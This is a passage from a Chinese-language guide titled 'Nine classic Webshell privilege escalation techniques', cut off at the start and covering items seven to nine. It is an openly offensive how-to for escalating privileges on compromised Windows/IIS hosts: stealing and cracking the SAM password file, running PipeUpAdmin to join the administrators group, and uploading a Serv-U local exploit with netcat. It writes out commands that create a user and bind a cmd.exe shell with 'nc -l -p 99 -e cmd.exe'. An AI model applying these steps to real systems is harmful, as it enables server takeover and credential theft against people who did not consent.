九种经典的Webshell提权技术

行目录，文件名可叫ssinc.dll或者admin.dll等（上面列的13个文件名之一）。 
然后等待IIS重启加载此dll，就可以获得权限了 

第七
 
下载系统的 %windir%\repair\sam.*（WinNT 4下是sam._ 而Windows 2000下是sam）文件， 
然后用L0pht等软件进行破解，只要能拿到，肯花时间，就一定可以破解。 

第八

PipeUpAdmin（Windows 2000下）, 在本机运行可以把当前用户帐号加入管理员组。普通用户和Guests组用户都可以成功运行。 

第九 

Serv-u Ftp Server 本地权限提升漏洞： 
很多主机的C:\Documents and Settings\All Users\ Documents目录以及下边几个子目录Documents没有设置权限，导致可以在这个目录上传并运行Exp. 直接上传了serv-u local exploit 和nc, 并且把serv-u的本地提升权限的名字命名为su.exe 文件就放在C:\Documents and Settings\All Users\ Documents, 然后我们用su.exe直接建立用户,也可以反弹一个shell过来的。 
具体命令： 
建立用户: serv-u.exe "cmd" 
>USER xl 
>PASS 111111 
反弹shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"